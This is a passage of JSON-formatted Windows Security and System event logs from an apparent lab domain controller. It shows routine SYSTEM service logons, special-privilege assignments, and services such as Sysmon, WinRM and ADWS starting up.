{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220257,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220258,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220259,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220260,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220261,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76809,"ProcessID":852,"ThreadID":3008,"Channel":"System","Message":"The AWSLiteAgent service entered the running state.","param1":"AWSLiteAgent","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76810,"ProcessID":852,"ThreadID":912,"Channel":"System","Message":"The RemoteRegistry service entered the running state.","param1":"RemoteRegistry","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220262,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220263,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76811,"ProcessID":852,"ThreadID":912,"Channel":"System","Message":"The EFS service entered the running state.","param1":"EFS","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76812,"ProcessID":852,"ThreadID":912,"Channel":"System","Message":"The IsmServ service entered the running state.","param1":"IsmServ","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76813,"ProcessID":852,"ThreadID":912,"Channel":"System","Message":"The Dfs service entered the running state.","param1":"Dfs","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76814,"ProcessID":852,"ThreadID":1244,"Channel":"System","Message":"The DFSR service entered the running state.","param1":"DFSR","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76815,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The WpnService service entered the running state.","param1":"WpnService","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76816,"ProcessID":852,"ThreadID":2660,"Channel":"System","Message":"The StateRepository service entered the running state.","param1":"StateRepository","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76817,"ProcessID":852,"ThreadID":2660,"Channel":"System","Message":"The sysmon64 service entered the running state.","param1":"sysmon64","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76818,"ProcessID":852,"ThreadID":2632,"Channel":"System","Message":"The WinRM service entered the running state.","param1":"WinRM","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76819,"ProcessID":852,"ThreadID":2632,"Channel":"System","Message":"The tiledatamodelsvc service entered the running state.","param1":"tiledatamodelsvc","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76820,"ProcessID":852,"ThreadID":948,"Channel":"System","Message":"The ADWS service entered the running state.","param1":"ADWS","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220264,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 